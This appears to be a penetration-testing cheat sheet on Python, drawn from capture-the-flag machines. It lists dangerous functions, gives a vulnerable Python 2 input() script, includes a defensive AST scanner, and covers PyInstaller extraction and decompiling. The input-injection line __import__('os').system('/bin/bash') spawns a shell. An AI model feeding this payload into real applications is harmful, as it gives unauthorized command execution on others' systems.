# Python

## Dangerous Functions

```python
commands.getoutput, commands.getstatus, commands.getstatusoutput, compile, cPickle.load,
cPickle.loads, eval, exec, execfile, input, marshal.load, marshal.loads, os.execl,
os.execle, os.execlp, os.execlpe, os.execv, os.execve, os.execvp, os.execvpe, os.popen,
os.popen2, os.popen3, os.popen4, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, os.startfile, os.system, pickle.load,
pickle.loads, popen2.popen2, popen2.popen3, popen2.popen4, shelve.open, subprocess.call,
subprocess.check_call, subprocess.check_output, subprocess.Popen, yaml.load
```

### Break out, `input()` example

```python
# siteisup_test.py (Python 2: input() evaluates whatever is typed as a Python expression)
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"
```

```bash
$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__('os').system('/bin/bash')
developer@updown:/home/developer/dev$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
```
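To find these sinks during code review, the following added example (not part of the original notes) walks a file's AST and reports calls to names from the list above, resolving `import ... as` and `from ... import` aliases. The function names and the sample input are hypothetical; the scanner runs on Python 3 and needs source that parses as Python 3, and it flags `input` because the page lists it, although only Python 2's `input()` evaluates its argument.

```python
import ast

# Subset of the page's "Dangerous Functions" list; add the remaining names as needed.
DANGEROUS = {
    "eval", "exec", "execfile", "compile", "input", "os.system", "os.popen",
    "pickle.load", "pickle.loads", "cPickle.load", "cPickle.loads", "yaml.load",
    "marshal.load", "marshal.loads", "shelve.open", "subprocess.Popen",
    "subprocess.call", "subprocess.check_call", "subprocess.check_output",
}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join([node.id] + parts[::-1]) if isinstance(node, ast.Name) else None

def find_dangerous_calls(source):
    """Return sorted (line, qualified name) pairs for calls to DANGEROUS names."""
    tree = ast.parse(source)
    aliases = {}  # local name -> real dotted name, taken from import statements
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            aliases.update({a.asname: a.name for a in node.names if a.asname})
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = node.module + "." + a.name
    hits = []
    for node in ast.walk(tree):
        name = dotted_name(node.func) if isinstance(node, ast.Call) else None
        if name is None:
            continue
        head, _, rest = name.partition(".")
        if head in aliases:  # "o.system" -> "os.system", "Popen" -> "subprocess.Popen"
            name = aliases[head] + ("." + rest if rest else "")
        if name in DANGEROUS:
            hits.append((node.lineno, name))
    return sorted(hits)

# Constructed sample input (Python 3 syntax so ast can parse it); it is parsed, never run.
SAMPLE = (
    "import os as o\nfrom subprocess import Popen\nurl = input('Enter URL here:')\n"
    "o.system('uptime')\nPopen(['id'])\nprint(eval(url))\n"
)

if __name__ == "__main__":
    for line, name in find_dangerous_calls(SAMPLE):
        print(f"line {line}: {name}")
```

A hit is a prompt for manual review, not a verdict: whether a call is exploitable depends on whether untrusted data reaches it.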

## PyInstaller / PyInstxtractor

> *“PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files – including the active Python interpreter! – and puts them with your script in a single folder, or optionally in a single executable file.”*

Single executable files created with PyInstaller can be extracted using [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor). Make sure to run the script with the Python version that matches the one used to build the executable!

```
PS C:\tools\pyinstxtractor> python3.7.exe pyinstxtractor.py C:\Users\pwn10\Documents\htb\vessel\passwordGenerator
[+] Processing C:\Users\pwn10\Documents\htb\vessel\passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: C:\Users\pwn10\Documents\htb\vessel\passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory
```

**Decompile:**

```
PS C:\> pip3 install uncompyle6
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> uncompyle6 passwordGenerator.pyc > passwordGenerator.py
PS C:\tools\pyinstxtractor\passwordGenerator_extracted> cat passwordGenerator.py
```

